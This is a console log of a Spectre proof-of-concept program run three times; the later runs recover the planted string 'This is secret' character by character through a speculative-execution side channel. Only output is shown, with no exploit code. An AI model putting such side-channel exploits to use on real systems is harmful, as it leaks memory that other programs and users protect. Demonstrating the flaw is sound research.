
E:\Spectre_PoC>branch.exe
trial#46780: guess='?' (score=84)
trial#0: guess='h' (score=39)
trial#24: guess='' (score=81)
trial#2: guess='' (score=81)
trial#190: guess='?' (score=81)
trial#93: guess='y' (score=90)
trial#31: guess='' (score=81)
trial#1: guess='' (score=87)
trial#9: guess='' (score=81)
trial#19: guess='' (score=87)
trial#14: guess='' (score=81)
trial#0: guess='r' (score=51)
trial#1326: guess='' (score=75)
trial#0: guess='t' (score=48)

E:\Spectre_PoC>branch.exe
trial#4646: guess='T' (score=69)
trial#0: guess='h' (score=54)
trial#13641: guess='i' (score=54)
trial#0: guess='s' (score=51)
trial#0: guess=' ' (score=39)
trial#212: guess='i' (score=48)
trial#0: guess='s' (score=51)
trial#101: guess=' ' (score=33)
trial#236: guess='s' (score=51)
trial#94: guess='e' (score=51)
trial#0: guess='c' (score=54)
trial#0: guess='r' (score=48)
trial#20: guess='e' (score=51)
trial#95: guess='t' (score=45)

E:\Spectre_PoC>branch.exe
trial#0: guess='T' (score=48)
trial#68387: guess='h' (score=48)
trial#73199: guess='i' (score=51)
trial#0: guess='s' (score=51)
trial#129149: guess=' ' (score=48)
trial#0: guess='i' (score=54)
trial#8422: guess='s' (score=51)
trial#0: guess=' ' (score=33)
trial#124634: guess='s' (score=57)
trial#332809: guess='e' (score=54)
trial#0: guess='c' (score=54)
trial#209729: guess='r' (score=51)
trial#0: guess='e' (score=54)
trial#35570: guess='t' (score=60)

E:\Spectre_PoC>